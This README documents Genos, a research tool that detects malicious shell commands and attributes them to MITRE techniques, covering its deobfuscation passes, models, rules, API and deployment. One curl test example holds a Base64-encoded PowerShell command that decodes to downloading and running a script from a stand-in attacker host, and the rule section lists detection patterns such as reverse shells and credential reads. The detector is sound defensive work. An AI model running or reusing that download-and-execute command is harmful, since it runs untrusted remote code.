Genos is a two-stage neural pipeline for real-time malicious command detection and MITRE ATT&CK technique attribution, served as a REST API over Gunicorn and Flask.
The system was developed as part of an IEEE research programme. This README is derived directly from the source code (engine.py, app.py, gunicorn.conf.py) and reflects the current behaviour of the main branch only.
The core inference logic lives in engine.py. The Flask API in app.py wraps it.
When the process starts:
- `python-dotenv` loads `.env` from the working directory.
- `GenosEngine` is constructed once — no hot-reloading of models.
- The engine resolves its asset paths in this order for each file:
  1. absolute path (if given)
  2. relative to `os.getcwd()`
  3. relative to the directory containing `engine.py`
  4. each fallback candidate in turn
- The specialist label map is loaded from the first file that exists:
  1. the `map_path` argument passed by the caller
  2. `config/specialist_map.json` ← current live path
  3. `models/specialist_map.json`
  4. if none found: built dynamically by reading `mitre_id` values from the raw MITRE CSV and sorting them
- `RobertaTokenizer` is loaded from `microsoft/codebert-base` (downloaded on first run, cached by HuggingFace).
- Both model checkpoints are loaded with `torch.load(..., weights_only=True)`.
- The app calls `engine.scan("warmup")` before accepting traffic; `/health` returns `{"status": "ok"}` once this completes.
Before tokenisation, scan() applies an entropy-aware deobfuscation loop. A command is treated as obfuscated if it matches any of these patterns (case-insensitive regex) or if its Shannon entropy exceeds 5.2 bits:
| Pattern | What it catches |
|---|---|
| `\[char\]` | PowerShell character-code constructions |
| `base64` / `frombase64` | Inline Base64 references |
| `reverse\(` | String reversal wrappers |
| `\+[ ]*'` | String concatenation fragments |
| `\$[a-z0-9_]{10,}` | Long obfuscated variable names |
| `\\x[0-9a-f]{2}` | Hex byte escapes |
If obfuscated, the engine runs up to 5 deobfuscation passes. Each pass applies, in order:
1. `universal_decoder` — decodes the whole string if it matches a bare Base64 regex
2. `decode_embedded_base64` — decodes `FromBase64String('...')` payloads inline
3. `extract_powershell_payload` — extracts the payload from `&(builder)(payload)` invocation wrappers, including `[System.Text.Encoding]::UTF8.GetString(...)` variants
4. `deobfuscate_char_constructions` — resolves `[char]65`, `(65..67) | % { [char]$_ }`, and mixed range+bareword patterns into literal characters
5. `clean_concatenation` — collapses `"ab" + "cd"` and `"ab" + bareword` forms
6. `pyminusone.deobfuscate(..., lang="powershell")` — optional AST-level simplification if `pyminusone` is installed; silently skipped otherwise
7. Runs the char and concatenation passes again after any AST simplification
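The simplest of these passes, `[char]N` resolution, can be approximated with a regex substitution. This is a simplified sketch, not the actual implementation — the real `deobfuscate_char_constructions` also handles range patterns such as `(65..67) | % { [char]$_ }`, which this sketch omits:

```python
import re

def resolve_char_constructions(text):
    """Rewrite PowerShell [char]N literals into the characters they
    encode, e.g. '[char]73' -> 'I'. Simplified sketch of one of the
    deobfuscation passes described above."""
    return re.sub(
        r"\[char\]\s*(\d{1,3})",              # match [char] followed by a decimal code
        lambda m: chr(int(m.group(1))),        # replace with the literal character
        text,
        flags=re.IGNORECASE,
    )
```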
The loop terminates early when:
- a pass produces no change in the text
- the absolute entropy delta between passes is less than `0.01` bits
After the loop, the processed command is lowercased and stripped before tokenisation.
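The entropy trigger and the bounded loop can be sketched as follows, assuming the standard Shannon entropy over the string's character distribution (the thresholds are the ones stated above; the pass functions themselves are stand-ins):

```python
import math
from collections import Counter

def shannon_entropy(text):
    """Shannon entropy in bits per character of the string's
    character distribution."""
    if not text:
        return 0.0
    n = len(text)
    counts = Counter(text)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())

def deobfuscation_loop(command, passes, max_passes=5, entropy_eps=0.01):
    """Sketch of the bounded loop: run the passes in order, stop when a
    full pass produces no change, when the entropy delta falls below
    entropy_eps bits, or after max_passes iterations."""
    prev_entropy = shannon_entropy(command)
    for _ in range(max_passes):
        decoded = command
        for apply_pass in passes:
            decoded = apply_pass(decoded)
        if decoded == command:                  # no change: stop
            break
        entropy = shannon_entropy(decoded)
        command = decoded
        if abs(entropy - prev_entropy) < entropy_eps:
            break                               # entropy converged: stop
        prev_entropy = entropy
    return command
```

A command whose entropy exceeds 5.2 bits (the trigger stated above) is fed into this loop even if none of the regex patterns match.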
Uses RobertaTokenizer from microsoft/codebert-base:
- `max_length`: `256` (override with the `GENOS_MAX_TOKENS` env var)
- `padding`: `max_length`
- `truncation`: enabled
- `return_tensors`: `"pt"`
Architecture:
```
CodeBERT CLS token (768-d)
  → Dropout(0.2)
  → Linear(768, 1024)
  → GELU
  → Dropout(0.2)
  → Linear(1024, 3)
```
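The head above can be written as an `nn.Sequential`. This is a sketch of the shape only — the checkpoint's actual module names and `state_dict` keys may differ:

```python
import torch
import torch.nn as nn

# Classification head applied to CodeBERT's 768-d CLS embedding.
# Layer ordering follows the architecture listing above; names are
# illustrative, not the checkpoint's exact keys.
gatekeeper_head = nn.Sequential(
    nn.Dropout(0.2),
    nn.Linear(768, 1024),
    nn.GELU(),
    nn.Dropout(0.2),
    nn.Linear(1024, 3),   # Benign / Malicious / Context_Dependent logits
)

cls_embedding = torch.randn(1, 768)   # stand-in for the CLS token
with torch.no_grad():
    logits = gatekeeper_head(cls_embedding)
probs = torch.softmax(logits, dim=-1)
```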
Inference runs under torch.no_grad() and torch.amp.autocast:
- CUDA device: `float16`
- CPU device: `bfloat16`
The model outputs three class probabilities mapped as:
| Model index | Internal label | Public label |
|---|---|---|
| 0 | Benign | Benign |
| 1 | Malicious | Malicious |
| 2 | Context_Dependent | Suspicious |
After the neural forward pass, a rule-based routing layer applies over the raw class probabilities. Routing can override the model output based on:
- Hard overrides — deterministic pattern matches (e.g. base64-decode piped to shell, reverse shell patterns, credential file reads) that force `Malicious` regardless of model confidence
- Malicious promotion — high-risk behavioural features (e.g. exploit tooling, sensitive sources) that promote weak `Benign`/`Suspicious` predictions to `Malicious`
- Malicious cap — commands that are risky but lack definitive attack indicators (e.g. `chmod 777`, `crontab -l`) are downgraded from `Malicious` to `Suspicious`
- Benign safe overrides — high-confidence benign predictions with no suspicious signals pass through directly
- Probability routing — remaining cases route by thresholds, margin, suspicious signal count, and feature set
The final public label is one of: Benign, Suspicious, Malicious, or Context_Dependent (requires_context action).
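The routing precedence can be sketched as a chain of checks. All inputs here are hypothetical booleans and counts standing in for the real rule-engine features, and the 0.95 cutoff is illustrative:

```python
def route(label, confidence, hard_override, high_risk,
          risky_no_ioc, suspicious_signals):
    """Sketch of the routing precedence described above; not the
    actual engine code."""
    if hard_override:                           # deterministic pattern match
        return "Malicious"
    if high_risk and label in ("Benign", "Suspicious"):
        return "Malicious"                      # malicious promotion
    if risky_no_ioc and label == "Malicious":
        return "Suspicious"                     # malicious cap
    if label == "Benign" and confidence >= 0.95 and suspicious_signals == 0:
        return "Benign"                         # safe pass-through
    # remaining cases fall through to probability/threshold routing
    return label
```

The key property is the ordering: hard overrides beat promotion, promotion beats the cap, and only clean high-confidence benign predictions skip the threshold logic.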
Tier 2 always runs, regardless of the Tier 1 label. Because it uses a TF-IDF + RF pipeline rather than a neural model, inference takes approximately 90 ms and adds negligible overhead.
Model file: models/specialist_tfidf_char_rf.pkl (scikit-learn pipeline, loaded with joblib).
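The pipeline's shape can be reproduced in miniature with scikit-learn. The data and hyperparameters below are toy stand-ins; the shipped model's exact vectoriser settings and forest size are not documented here:

```python
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.ensemble import RandomForestClassifier
from sklearn.pipeline import make_pipeline

# Miniature stand-in for the Tier 2 pipeline: character n-gram TF-IDF
# features feeding a Random Forest. Hyperparameters are illustrative.
pipeline = make_pipeline(
    TfidfVectorizer(analyzer="char", ngram_range=(2, 4)),
    RandomForestClassifier(n_estimators=50, random_state=0),
)

commands = [
    "whoami /all", "net user /domain",           # toy T1087-style examples
    "reg save hklm\\sam sam.hive", "mimikatz",   # toy T1003-style examples
]
labels = ["T1087", "T1087", "T1003", "T1003"]
pipeline.fit(commands, labels)
pred = pipeline.predict(["net user administrator /domain"])[0]
```

Because the whole pipeline is a single sklearn object, `joblib.load` on the `.pkl` file restores both the vectoriser vocabulary and the forest in one step.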
Input text is built by _build_variant_a_text(), which calls the parser/ module to produce a structured "Variant A" representation of the command:
RAW: <normalised command>
RESIDUAL: <parser-extracted residual tokens>
For obfuscated commands the engine runs Tier 2 twice — once on the original text, once on the decoded payload — and merges results by taking the highest confidence score per MITRE code. The final response caps at 5 codes.
Classes come from config/specialist_map.json (108 MITRE techniques). The pipeline's integer class indices are mapped back to MITRE IDs via _tfidf_idx_to_label.
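The two-pass merge can be sketched as follows (`merge_mitre_results` is a hypothetical helper name mirroring the highest-confidence-per-code and top-5 cap behaviour described above):

```python
def merge_mitre_results(first, second, cap=5):
    """Merge two Tier 2 result lists by keeping the highest confidence
    per MITRE code, then return the top `cap` codes by confidence.
    Hypothetical helper sketching the behaviour described above."""
    best = {}
    for item in (*first, *second):
        code, conf = item["code"], item["confidence"]
        if conf > best.get(code, -1.0):
            best[code] = conf                 # keep the higher score per code
    merged = [{"code": c, "confidence": v} for c, v in best.items()]
    merged.sort(key=lambda x: x["confidence"], reverse=True)
    return merged[:cap]                       # final response caps at 5 codes
```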
GenosEngine.scan() returns:
```json
{
  "label": "Malicious",
  "label_confidence": 0.9981,
  "deobfuscated_cmd": "invoke-expression ...",
  "MITRE_codes": [
    { "code": "T1059", "confidence": 97.43 },
    { "code": "T1021", "confidence": 1.22 },
    { "code": "T1078", "confidence": 0.81 },
    { "code": "T1003", "confidence": 0.48 },
    { "code": "T1087", "confidence": 0.06 }
  ]
}
```

For obfuscated commands with a decoded payload, two additional fields are populated:
```json
{
  "decoded_payload": "<deobfuscated text>",
  "payload_mitre_codes": [ ... ]
}
```

For `Context_Dependent` labels:
```json
{
  "label": "Context_Dependent",
  "action": "requires_context",
  ...
}
```

Notes:

- `label` is one of: `Benign`, `Suspicious`, `Malicious`, `Context_Dependent`
- `label_confidence` is a raw probability (0–1) from the engine; `app.py`'s `_to_percentage()` converts it to a percentage for the HTTP response
- `MITRE_codes` is present on all responses (Tier 2 always runs); it may be empty if no codes exceed the classifier's threshold
- `deobfuscated_cmd` is `null` when the input was not flagged as obfuscated
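The probability-to-percentage conversion is presumably along these lines (a sketch matching the response examples; the exact rounding in `app.py`'s `_to_percentage()` may differ):

```python
def to_percentage(probability):
    """Convert an engine probability in [0, 1] to a percentage rounded
    to two decimals, matching the response examples (0.9981 -> 99.81).
    Sketch of _to_percentage(); the real rounding may differ."""
    return round(probability * 100, 2)
```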
Tier 1 uses a CodeBERT neural model. Tier 2 uses a TF-IDF char n-gram + Random Forest sklearn pipeline.
| File | Purpose |
|---|---|
| `models/gatekeeper.pt` | Tier 1 — 3-class CodeBERT gatekeeper (Benign / Suspicious / Malicious) |
| `models/specialist_tfidf_char_rf.pkl` | Tier 2 — active MITRE attribution model (char n-gram TF-IDF + RF) |
| `models/specialist_tfidf_rf.pkl` | Tier 2 alternative — word-level TF-IDF + RF variant (not loaded by default) |
| `config/specialist_map.json` | Maps integer class indices to MITRE technique IDs (108 classes) |
| `config/gatekeeper_meta.json` | Gatekeeper threshold and training metadata read at startup |
Model weights and large artefacts are tracked with Git LFS (.gitattributes). The pkl files are excluded from git entirely via .gitignore due to their size (2.4–2.8 GB); they must be provided out-of-band (e.g. direct copy, shared storage, or LFS if migrated).
Served by Gunicorn on 127.0.0.1:6001 by default.
{ "status": "ok" }Returns "loading" if the engine warm-up has not yet completed.
Requires a running MongoDB instance configured via MONGO_URI. API keys are stored in the genos.api_keys collection; usage is tracked in genos.usage.
Request:
```json
{
  "api_key": "YOUR_KEY",
  "command": "net user /domain"
}
```

The API key is read from the JSON body, not from a header. The command may be plain text or a Base64-encoded string; `app.py` attempts a full Base64 decode before passing it to the engine, falling back to plain text if the decode fails.
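The decode-then-fallback behaviour can be sketched as follows, assuming strict validation so plain text is not mistaken for Base64 (the real validation logic in `app.py` may differ):

```python
import base64
import binascii

def decode_command(raw):
    """Try a strict full-string Base64 decode; fall back to the raw
    text on any failure. Sketch of app.py's handling of the `command`
    field, not the exact implementation."""
    try:
        # validate=True rejects characters outside the Base64 alphabet,
        # so ordinary shell commands fail fast and pass through unchanged
        return base64.b64decode(raw, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return raw
```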
Response (malicious):
```json
{
  "label": "Malicious",
  "label_confidence": 99.81,
  "MITRE_codes": [
    { "code": "T1087", "confidence": 97.43 },
    { "code": "T1069", "confidence": 1.22 }
  ]
}
```

Response (benign):
```json
{
  "label": "Benign",
  "label_confidence": 99.99,
  "MITRE_codes": []
}
```

Error responses:
| Status | Meaning |
|---|---|
| 400 | Missing `api_key` or `command` |
| 401 | API key not found in MongoDB |
| 500 | Engine error |
| 503 | `MONGO_URI` not configured |
Intended for local testing, CI, and benchmark scripts where MongoDB is not required.
Request:
```json
{
  "command": "whoami",
  "internal_token": "optional"
}
```

`internal_token` is only enforced when `INTERNAL_TEST_TOKEN` is set in the environment. Omit the field entirely when the env var is unset.
Response shape is identical to /scan.
Always use a dedicated venv rather than the system Python or any checked-in environment directory. The project .gitignore already excludes venv/ and my_flask_env/.
```bash
cd genos_api
python3 -m venv .venv
source .venv/bin/activate
python -m pip install --upgrade pip setuptools wheel
```

Use `.venv` (or any name that `.gitignore` covers) rather than `venv` if you want the directory ignored automatically. The existing `.gitignore` entry covers `venv/` literally.
```bash
pip install -r requirements.txt
```

PyTorch and CUDA: `requirements.txt` pins the major/minor version of PyTorch but not the CUDA wheel suffix, because the suffix is machine-specific. If you need a specific CUDA build, install it first from the official index before running the above:
```bash
# Example: CUDA 12.1 build
pip install torch==2.5.1+cu121 --index-url https://download.pytorch.org/whl/cu121
pip install -r requirements.txt
```

CPU-only inference works without any CUDA toolkit; the engine auto-detects the device and uses bfloat16 autocast on CPU.
Optional — PowerShell deobfuscation enhancement:
```bash
pip install pyminusone
```

If `pyminusone` is not installed, the engine silently falls back to its built-in deobfuscation rules.
```bash
cp .env.example .env
# edit .env with your values
```

| Variable | Used in | Default | Purpose |
|---|---|---|---|
| `MONGO_URI` | `app.py` | — | Connection string for MongoDB; enables the `/scan` route |
| `INTERNAL_TEST_TOKEN` | `app.py` | — | Optional auth token for `/scan/internal`; unenforced if unset |
| `GENOS_API_BIND` | `gunicorn.conf.py` | `127.0.0.1:6001` | Gunicorn bind address |
| `GENOS_MAX_TOKENS` | `engine.py` | `256` | Tokeniser max sequence length |
| `CURRENT_TIME` | `app.py` | `"2026-03-17T00:00:00.000+00:00"` | Timestamp written into Mongo usage records |
| `GENOS_T1_EFFECTIVE_BATCH` | `trainer1.py` | `256` | Training only: effective batch size |
| `GENOS_T1_MICRO_BATCH` | `trainer1.py` | `32` | Training only: micro-batch size for gradient accumulation |
| `GENOS_T1_USE_COMPILE` | `trainer1.py` | `0` | Training only: set to `1` to enable `torch.compile()` |
```bash
source .venv/bin/activate
gunicorn -c gunicorn.conf.py app:app
```

The worker loads the CodeBERT gatekeeper and the Tier 2 specialist pipeline, then runs a warm-up pass before accepting traffic. The 300 s Gunicorn timeout covers this load time. On a machine with a GPU and the model weights already cached locally, startup typically takes under 60 s.
```bash
curl -s http://127.0.0.1:6001/health

curl -s -X POST http://127.0.0.1:6001/scan/internal \
  -H "Content-Type: application/json" \
  -d '{"command": "whoami"}'

curl -s -X POST http://127.0.0.1:6001/scan/internal \
  -H "Content-Type: application/json" \
  -d '{"command": "powershell -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcAA6AC8ALwBhAHQAdABhAGMAawBlAHIALgBjAG8AbQAvAG0AYQBsAHcAYQByAGUALgBzAGgAIAB8ACAASQBFAFgA"}'
```

To restart or check the running service:

```bash
bash scripts/ops/reload_api.sh reload   # stop → start → health check
bash scripts/ops/reload_api.sh status   # check /health
```

The reload script is hardcoded to `127.0.0.1:6001` and activates `venv/bin/activate` relative to the project root.
```python
import sys
sys.path.insert(0, "/path/to/genos_api")

from engine import GenosEngine

engine = GenosEngine()
result = engine.scan("net localgroup administrators")
print(result)
```

| Setting | Value | Reason |
|---|---|---|
| `bind` | `127.0.0.1:6001` | Loopback only; expose via reverse proxy |
| `workers` | `1` | One model copy in GPU memory; more workers multiplies VRAM usage |
| `worker_class` | `sync` | CUDA contexts do not survive a fork |
| `timeout` | `300` | Covers model loading on startup |
| `preload_app` | not set | Omitted deliberately; pre-loading would fork after CUDA initialisation |
Run Gunicorn on localhost and expose Nginx (or Caddy) publicly. Never bind Gunicorn directly to 0.0.0.0 in production without a reverse proxy.
Minimal Nginx location block:
```nginx
location /scan {
    proxy_pass http://127.0.0.1:6001;
    proxy_set_header Host $host;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_read_timeout 60s;
}
```

Example systemd unit:

```ini
[Unit]
Description=Genos API
After=network.target

[Service]
Type=simple
User=genos
WorkingDirectory=/opt/genos_api
EnvironmentFile=/opt/genos_api/.env
ExecStart=/opt/genos_api/.venv/bin/gunicorn -c gunicorn.conf.py app:app
Restart=on-failure
RestartSec=5

[Install]
WantedBy=multi-user.target
```

Runs a deployment-aligned evaluation comparing the Genos neural pipeline against a TF-IDF + Random Forest baseline.
```bash
cd genos_api
python scripts/benchmark/ieee.py
```

Metrics reported: Tier 1 AUC, precision, recall, F1; Tier 2 top-1 / top-3 accuracy; macro F1; deobfuscation time; end-to-end latency at multiple benign traffic ratios; ROC curve saved to `logs/`.
Hits the live API with configurable concurrency. Defaults: 500 requests, 50 % malicious, 20 concurrent workers, 85 % confidence threshold.
```bash
# Requires API running on 127.0.0.1:6001
python scripts/benchmark/internal_api_test.py
```

Results are written to `live_stress_report.txt`.
| Script | Purpose |
|---|---|
| `scripts/training/trainer1.py` | Train the Tier 1 Gatekeeper classifier |
| `scripts/training/trainer2_hybrid.py` | Train the Tier 2 Specialist MITRE attribution classifier |
| `scripts/training/trainer_tfidf.py` | Train the TF-IDF baseline classifier |
| `scripts/data/synthesize_gatekeeper_data.py` | Synthesize gatekeeper training data |
| `scripts/data/augment_context_sensitivity.py` | Context-sensitivity augmentation |
| `scripts/data/data_scraper.py` | Raw data collection |
Training data lives in `data/training/genos_dataset/`. Trainers read the CSVs, whose schema is `command` (string) and `mitre_id` (string — `"Benign"` or a MITRE technique ID such as `T1059`). Hybrid trainers additionally read from the JSONL files in the same directory.
```
app.py                      Flask application and route handling
engine.py                   GenosEngine — deobfuscation and two-tier inference
gunicorn.conf.py            Gunicorn runtime configuration
requirements.txt            Python dependencies
reqs.txt                    Alias: -r requirements.txt
.env.example                Environment variable template
config/
    specialist_map.json         Active 108-class MITRE technique → integer label map
    definitive_mitre_map.json   Full MITRE technique reference
    label_map.json              Human-readable label definitions
    meta/                       Training run metadata and backups (not loaded at runtime)
        gatekeeper_meta.json
        specialist_meta.json
        specialist_residual_a_meta.json
        specialist_residual_b_meta.json
        specialist_map_108.json.bak
        ...
models/
    gatekeeper.pt                   Tier 1 3-class CodeBERT gatekeeper weights (Git LFS)
    specialist_tfidf_char_rf.pkl    Tier 2 active model — char n-gram TF-IDF + RF (not in git, >2 GB)
    specialist_tfidf_rf.pkl         Tier 2 word-level variant (not in git, >2 GB)
    archive/                        Historical and experimental checkpoints (Git LFS)
        gatekeeper_pre_augment.pt
        gatekeeper_pre_context_augment.pt
        specialist_residual_a.pt
        specialist_residual_b.pt
data/training/
    genos_dataset/              Primary train / val / test splits (CSV)
        gatekeeper_train.csv        Benign + malicious — Gatekeeper training
        gatekeeper_val.csv
        gatekeeper_test.csv
        specialist_train.csv        Malicious commands — Specialist training
        specialist_val.csv
        specialist_test.csv
        context_augment_*.csv       Context-augmented variants
        synthetic_gatekeeper_*.csv  Synthetic benign augmentation splits
        hybrid_specialist_*.jsonl   Hybrid JSONL specialist format
        provenance.json             Dataset build provenance record
    genos_residual/             Residual variant datasets (JSONL, variants a/b/c)
    genos_residual_cli/         CLI-specific residual datasets
    genos_residual_expanded/    Expanded residual datasets
parser/                     Command parsing and rule engine module
    parser.py                   Main parser entry point
    rule_engine.py              Rule-based pre-classification
    deobfuscator.py             Standalone deobfuscation logic
    semantic_features.py        Feature extraction helpers
    candidate_mask.py           Candidate MITRE label masking
    residual_text.py            Residual text extraction
    build_*.py                  Dataset builder scripts
    eval_*.py                   Parser evaluation scripts
    validate_*.py               Validation harnesses
    parser_gold.jsonl           Gold-label evaluation set
    parser_schema.json          Parser output schema
scripts/
    training/
        trainer1.py                 Gatekeeper training script
        trainer2_hybrid.py          Specialist hybrid training script
        trainer_tfidf.py            TF-IDF baseline training
        generate_cli_specialist_dataset.py  CLI-specific dataset generation
    data/
        augment_context_sensitivity.py      Context-sensitivity augmentation
        data_scraper.py                     Raw data collection
        synthesize_gatekeeper_data.py       Synthetic gatekeeper data generation
    benchmark/
        ieee.py                     IEEE pipeline benchmark (neural vs TF-IDF baseline)
        internal_api_test.py        Async live API stress test
        mitre_benchmark.py          MITRE technique attribution benchmark
        gatekeeper_3class.py        Three-class gatekeeper evaluation
        benign_fp_test.py           False-positive testing on benign traffic
        e2e_llm.py                  End-to-end LLM comparison benchmark
        tfidf_vs_openai.py          TF-IDF vs OpenAI comparison
        test_variant_a_inference.py Residual variant A inference test
        3class/                     Three-class benchmark results and corpora
    ops/
        reload_api.sh               Stop → start → health-check helper
        gunicorn.ctl                Gunicorn process control file
logs/                       Generated benchmark output (gitignored in production)
    ieee_results_*.json         IEEE benchmark result snapshots
    ieee_roc_curve_*.png        ROC curve plots
    mitre_benchmark.json
    gatekeeper_3class_benchmark.json
    tfidf_specialist_results.json
    tfidf_vs_openai.json
    trainer1_balanced.log
    real_world_benign_results.csv
```
- `.env` is excluded by `.gitignore`; never commit real secrets
- `/scan` requires a valid API key checked against MongoDB; no unauthenticated inference path exists on that route
- `/scan/internal` bypasses the database and should not be exposed publicly; keep it behind a firewall or protect it with `INTERNAL_TEST_TOKEN`
- Gunicorn is bound to loopback only; the reverse proxy is responsible for TLS termination and rate limiting
- The deobfuscation loop is bounded to 5 passes with an entropy-delta early-exit to prevent deobfuscation bombs from causing unbounded processing
- Model weights are loaded with `weights_only=True` to prevent arbitrary code execution via malicious checkpoint files
If you use Genos in your research, please cite the associated IEEE paper.